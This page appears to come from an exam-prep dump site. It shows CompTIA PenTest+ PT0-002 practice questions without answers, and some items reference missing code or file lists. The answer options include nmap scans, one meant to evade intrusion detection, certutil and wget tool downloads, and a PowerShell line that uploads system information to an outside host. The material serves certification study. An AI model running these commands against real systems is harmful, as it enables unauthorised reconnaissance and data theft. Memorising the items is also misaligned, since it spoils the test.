Weekend Sale Limited Time 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: xmas50

CompTIA PT0-002 - CompTIA PenTest+ Certification Exam

CompTIA PT0-002 Premium Access     Download Demo    
Page: 14 / 14
Total 464 questions

In an unprotected network file repository, a penetration tester discovers a text file containing usernames and passwords in cleartext and a spreadsheet containing data for 50 employees, including full names, roles, and serial numbers. The tester realizes some of the passwords in the text file follow the format: . Which of the following would be the best action for the tester to take NEXT with this information?

A.

Create a custom password dictionary as preparation for password spray testing.

B.

Recommend using a password manage/vault instead of text files to store passwords securely.

C.

Recommend configuring password complexity rules in all the systems and applications.

D.

Document the unprotected file repository as a finding in the penetration-testing report.

A penetration tester finds a PHP script used by a web application in an unprotected internal source code repository. After reviewing the code, the tester identifies the following:

Which of the following tools will help the tester prepare an attack for this scenario?

A.

Hydra and crunch

B.

Netcat and cURL

C.

Burp Suite and DIRB

D.

Nmap and OWASP ZAP

A penetration tester has obtained a low-privilege shell on a Windows server with a default configuration and now wants to explore the ability to exploit misconfigured service permissions. Which of the following commands would help the tester START this process?

A.

certutil –urlcache –split –f http://192.168.2.124/windows-binaries/ accesschk64.exe

B.

powershell (New-Object System.Net.WebClient).UploadFile(‘http://192.168.2.124/ upload.php’, ‘systeminfo.txt’)

C.

schtasks /query /fo LIST /v | find /I “Next Run Time:”

D.

wget http://192.168.2.124/windows-binaries/accesschk64.exe –O accesschk64.exe

You are a penetration tester running port scans on a server.

INSTRUCTIONS

Part 1: Given the output, construct the command that was used to generate this output from the available options.

Part 2: Once the command is appropriately constructed, use the given output to identify the potential attack vectors that should be investigated further.

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

A penetration tester wants to scan a target network without being detected by the client’s IDS. Which of the following scans is MOST likely to avoid detection?

A.

nmap –p0 –T0 –sS 192.168.1.10

B.

nmap –sA –sV --host-timeout 60 192.168.1.10

C.

nmap –f --badsum 192.168.1.10

D.

nmap –A –n 192.168.1.10

A penetration tester discovered a vulnerability that provides the ability to upload to a path via directory traversal. Some of the files that were discovered through this vulnerability are:

Which of the following is the BEST method to help an attacker gain internal access to the affected machine?

A.

Edit the discovered file with one line of code for remote callback

B.

Download .pl files and look for usernames and passwords

C.

Edit the smb.conf file and upload it to the server

D.

Download the smb.conf file and look at configurations

A client has requested that the penetration test scan include the following UDP services: SNMP, NetBIOS, and DNS. Which of the following Nmap commands will perform the scan?

A.

nmap –vv sUV –p 53, 123-159 10.10.1.20/24 –oA udpscan

B.

nmap –vv sUV –p 53,123,161-162 10.10.1.20/24 –oA udpscan

C.

nmap –vv sUV –p 53,137-139,161-162 10.10.1.20/24 –oA udpscan

D.

nmap –vv sUV –p 53, 122-123, 160-161 10.10.1.20/24 –oA udpscan

A penetration tester obtained the following results after scanning a web server using the dirb utility:

...

GENERATED WORDS: 4612

---- Scanning URL: http://10.2.10.13/ ----

+ http://10.2.10.13/about (CODE:200|SIZE:1520)

+ http://10.2.10.13/home.html (CODE:200|SIZE:214)

+ http://10.2.10.13/index.html (CODE:200|SIZE:214)

+ http://10.2.10.13/info (CODE:200|SIZ E:214)

...

DOWNLOADED: 4612 – FOUND: 4

Which of the following elements is MOST likely to contain useful information for the penetration tester?

A.

index.html

B.

about

C.

info

D.

home.html

A penetration tester is attempting to discover live hosts on a subnet quickly.

Which of the following commands will perform a ping scan?

A.

nmap -sn 10.12.1.0/24

B.

nmap -sV -A 10.12.1.0/24

C.

nmap -Pn 10.12.1.0/24

D.

nmap -sT -p- 10.12.1.0/24